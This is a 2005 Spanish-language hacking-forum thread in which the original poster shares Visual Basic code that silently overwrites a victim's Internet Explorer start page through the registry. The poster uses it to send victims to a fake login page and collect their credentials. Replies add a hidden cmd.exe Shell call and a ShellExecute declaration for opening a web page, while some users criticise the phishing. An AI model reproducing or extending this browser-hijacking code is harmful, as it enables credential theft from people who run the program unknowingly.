elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Pregunta interesante-VB
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Pregunta interesante-VB  (Leído 2,386 veces)
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Pregunta interesante-VB
« en: 2 Septiembre 2005, 21:09 pm »

Hola, bueno, hoy he creado una aplicación que lo que hace es que la persona que lo abre se le pone como página de incio de internet la que yo he configurado, esto lo he hecho servir para hacer como una especie de "fake" he puesto que se le ponga como página de inicio un falso inicio de sesión, lo rellena y llega a mi db XD que lista soy, eh? ajajajaj es coña


bueno, aki esta el code:


Código:
Const REG_SZ = 1
Const HKEY_CURRENT_USER = &H80000001
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String)
    Dim Ret
   
    RegCreateKey hKey, strPath, Ret
   
    RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData)
   
    RegCloseKey Ret
End Sub

Private Sub Form_Load()
 Dim strString As String
 
 strString = Label1.Caption
 
 SaveString HKEY_CURRENT_USER, "Software\Microsoft\Internet Explorer\Main", "Start Page", strString
 MsgBox ("ajajaj mira la pagina de inicio !"), vbInformation
 End
End Sub



entonces, mi duda es esta:

en vez de:

Código:
MsgBox ("ajajaj mira la pagina de inicio !"), vbInformation

no se si
Código:
vbInformation

corresponde a algo del mensaje d alerta o no xD

lo q yo quiero es q en vez de poner el mensaje ese, se abra una web, entonces en esa web, sera mia y hare una animacion o un juego, nose, el caso es q quiero q se abra una web, para q m orienteis, como seria mas o menos para q se abriera una web (orientadme sobre el code)

GRACIAS
ME PONGO QUE NOTIFIQUE RESPUESTAS  ;D


En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: Pregunta interesante-VB
« Respuesta #1 en: 2 Septiembre 2005, 21:35 pm »

bueno, creo q ya se como es,mañana os digo, y lo publicare para kien le interese  ;D


En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Pregunta interesante-VB
« Respuesta #2 en: 2 Septiembre 2005, 21:47 pm »

Como pareces tan lista te lo diré, esta es una manera:
Shell "cmd.exe /c explorer http://miweb.com", vbHide
En línea

Matrix_Soul

Desconectado Desconectado

Mensajes: 279



Ver Perfil
Re: Pregunta interesante-VB
« Respuesta #3 en: 3 Septiembre 2005, 00:05 am »

Efectivamente, ese codigo si no m ekevoco (ace muxo que no toco el vb ni win2), es para modificar un valor en el registro de windows, y de donde sakaste el codigo, al final agrego una linea xa abrir un msgbox que diga eso.

Si cambias esa linea x lo que dijo YeIk0s, en lugar del msgbox se deberia abrir el explorador, y iniciaria con la nueva pagina de inicio.

Creo que asi es xo no toy seguro.
En línea

NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: Pregunta interesante-VB
« Respuesta #4 en: 3 Septiembre 2005, 01:03 am »

che GreenDevil, antes de postear busca info y experimenta a ver que logras hacer... si ahi se te complica mucho, entonces postea... pero no postees algo y a los 20 mins ya sabes como es...

cya

G0nz4







HUMILDAD ANTE TODO
En línea

Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: Pregunta interesante-VB
« Respuesta #5 en: 3 Septiembre 2005, 04:20 am »

Código:
Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Usa la función ShellExecute así se abre el explorador predeterminado.

Saludos.

P.D: ¿No podrías hacer cosas más productivas para aprender?
En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: Pregunta interesante-VB
« Respuesta #6 en: 3 Septiembre 2005, 11:24 am »

bueno, creo q ya se como es,mañana os digo, y lo publicare para kien le interese  ;D

si disculpad, esq lo publike, pero despues como una "premonicion" o algo asi JAJAJAJA m vino a la cabeza como se hacia  :-[
disculpad.. por lo menos posteando mi pregunta y poniendo ese code a muchos los abre ayudado n algo, no?  :P

PD: a ver... si... esto no es una cosa "productiva" pero en TODO me gusta experimentar DE TODO
menos  n las mates y la musica teorica XD ODIO ESO
En línea

Xpeed


Desconectado Desconectado

Mensajes: 472


Res Publica Non Dominetur


Ver Perfil
Re: Pregunta interesante-VB
« Respuesta #7 en: 3 Septiembre 2005, 11:38 am »

pfff las mates (calculo)  r000000lz, ademas, Anhur se refiere a cosas de verdad productivas no simplemente capturar datos mediante fakes, intenta crear aplicaciones que busquen soluciones y acrecenten tu conocimiento..


un saludo.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
YoWhatsapp, un MOD de Whatsapp muy interesante.
Android
jrafael99 4 9,548 Último mensaje 9 Septiembre 2022, 20:41 pm
por TickTack
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines